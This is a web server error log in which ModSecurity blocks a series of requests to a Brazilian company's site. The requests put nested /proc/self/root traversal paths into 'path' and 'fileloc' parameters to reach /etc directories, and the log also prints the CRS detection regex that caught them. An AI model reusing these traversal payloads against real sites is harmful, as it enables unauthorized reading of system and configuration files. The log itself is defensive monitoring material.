[Tue Mar 17 12:09:22.939209 2026] [:error] [pid 17965:tid 140411632822016] [client 74.7.243.203:34800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluoqt8Nd0UC_OcbVG-zQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:09:33.296774 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.243.203:34804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablurdCmCSWTlPouqorZ_wAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:09:35.699169 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.243.203:55434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablur64xEDsg_V3ESNZA7AAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:09:50.801251 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.243.203:55450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluvdCmCSWTlPouqoraCgAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:50.804182 2026] [:error] [pid 9155:tid 140411741927168] [client 74.7.241.46:49290] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluvtbI7zhHXcabyMU0wgAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:52.193173 2026] [:error] [pid 18380:tid 140411582465792] [client 74.7.241.46:54330] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluwK4xEDsg_V3ESNZA9wAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:53.322172 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.243.203:47738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluwa4xEDsg_V3ESNZA-QAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:09:54.487561 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.241.46:54332] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluwtCmCSWTlPouqoraDAAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:57.882571 2026] [:error] [pid 9299:tid 140411733534464] [client 74.7.243.203:47752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluxb-sgTmmJoPuMdysqgAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:10:06.366457 2026] [:error] [pid 18380:tid 140411590858496] [client 74.7.243.203:47762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluzq4xEDsg_V3ESNZBAgAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:10:07.590096 2026] [:error] [pid 17965:tid 140411741927168] [client 74.7.241.46:54334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluz6t8Nd0UC_OcbVG_BwAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:10:16.193014 2026] [:error] [pid 9299:tid 140411666392832] [client 74.7.241.46:53298] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu2L-sgTmmJoPuMdysugAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:10:17.584830 2026] [:error] [pid 2160:tid 140411632822016] [client 74.7.241.46:53312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu2Tjrdei6i7MVRTDSMgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:10:18.262216 2026] [:error] [pid 9299:tid 140411649607424] [client 74.7.243.203:44694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu2r-sgTmmJoPuMdysvAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:10:19.621364 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.243.203:49570] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu29CmCSWTlPouqoraFAAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:10:24.515617 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.46:41014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu4AeiSKl8TjouI-YQgAAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:10:26.659886 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.203:53654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu4geiSKl8TjouI-YQggAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:10:27.975612 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:53660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu49CmCSWTlPouqoraFQAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:10:44.728134 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.46:41028] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu9KBJNF7axNlVR0ULKgAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:10:47.476693 2026] [:error] [pid 9299:tid 140411716749056] [client 74.7.241.46:33786] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu97-sgTmmJoPuMdyswgAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:10:49.866569 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.241.46:54658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablu-a4xEDsg_V3ESNZBDAAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
